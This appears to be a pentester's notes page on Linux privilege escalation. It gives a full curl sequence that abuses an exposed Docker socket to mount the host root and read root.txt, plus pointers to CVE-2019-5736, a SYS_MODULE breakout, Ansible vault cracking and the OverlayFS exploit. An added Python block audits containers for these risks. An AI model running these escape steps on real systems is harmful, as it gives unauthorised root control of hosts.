xct's notes
Linux

Exposed Docker Socket

1) curl -i -s -k -X 'POST' -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "188a2704d8b0","Volumes": {"/hostos/": {}},"HostConfig": {"Binds": ["/:/hostos"]}}' http://localhost/containers/create --unix-socket /var/run/docker.sock
2) curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<container_id>/start
3) curl -i -s -X POST -H "Content-Type: application/json" --data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/hostos/root/root.txt"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' http://localhost/containers/<container_id>/exec --unix-socket /var/run/docker.sock
4) curl -i -s -X POST -H 'Content-Type: application/json' --data-binary '{"Detach": false,"Tty": false}' http://localhost/exec/<exec_id>/start --unix-socket /var/run/docker.sock

Docker Exec

If you have a low-privileged user that can run sudo docker exec ..., chances are you can use CVE-2019-5736 (Ubuntu 18.04, Debian 9) to escalate to root on the host. Modify main.go with your payload and execute it in the container, then run another sudo docker exec ... to trigger it.

Docker Escape using SYS_MODULE cap

Abusing SYS_MODULE capability to perform Docker container breakout (Medium)
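A defender-side check for the two conditions the Exposed Docker Socket and SYS_MODULE notes above depend on: a docker.sock that is writable beyond root and the docker group, and a container whose HostConfig carries a host root bind mount, Privileged, or an added SYS_MODULE capability. This is an added example, not code from xct's notes; the inspect document is a constructed sample modelled on "docker inspect" output, and the socket check takes a mode and group ids as arguments instead of reading the filesystem.

```python
import json
import stat
from typing import Dict, List

# Constructed sample, modelled on the JSON "docker inspect <id>" returns.
# Only the HostConfig fields the checks below look at are included.
SAMPLE_INSPECT = json.loads("""
{
  "Id": "0123456789ab",
  "HostConfig": {
    "Binds": ["/:/hostos", "/var/log:/logs:ro"],
    "Privileged": true,
    "CapAdd": ["SYS_MODULE"],
    "PidMode": ""
  }
}
""")

# Host paths that give a container control over the host when bind-mounted.
SENSITIVE_HOST_PATHS = ("/", "/var/run/docker.sock", "/etc", "/root", "/proc", "/sys")
DANGEROUS_CAPS = ("SYS_MODULE", "SYS_ADMIN", "SYS_PTRACE")


def audit_host_config(inspect: Dict) -> List[str]:
    """Return one finding per risky setting in a container's inspect document."""
    hc = inspect.get("HostConfig", {})
    findings = []
    for bind in hc.get("Binds") or []:
        src = bind.split(":")[0]  # host side of "src:dst[:opts]"
        if src in SENSITIVE_HOST_PATHS:
            findings.append(f"bind mount of host path {src!r} ({bind})")
    if hc.get("Privileged"):
        findings.append("Privileged: true (all capabilities, all host devices)")
    for cap in hc.get("CapAdd") or []:
        if cap.upper().replace("CAP_", "") in DANGEROUS_CAPS:
            findings.append(f"dangerous capability added: {cap}")
    if hc.get("PidMode") == "host":
        findings.append("PidMode: host (host PID namespace shared)")
    return findings


def socket_is_exposed(mode: int, owner_gid: int, docker_gid: int) -> bool:
    """True if docker.sock is writable by others, or by a group other than docker."""
    world_write = bool(mode & stat.S_IWOTH)
    foreign_group_write = bool(mode & stat.S_IWGRP) and owner_gid != docker_gid
    return world_write or foreign_group_write
```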

Ansible Credentials

Find and check "ansible.yml". A vault-encrypted password can be converted to a crackable hash with "ansible2john" and, once the vault password is known, decrypted:
cat pw.txt | ansible-vault decrypt

Ubuntu 20.04 OverlayFS Exploit CVE-2021-3493

Should work on most Ubuntu versions not patched after March 2021; tested on 4.15.0-132-generic #136-Ubuntu.
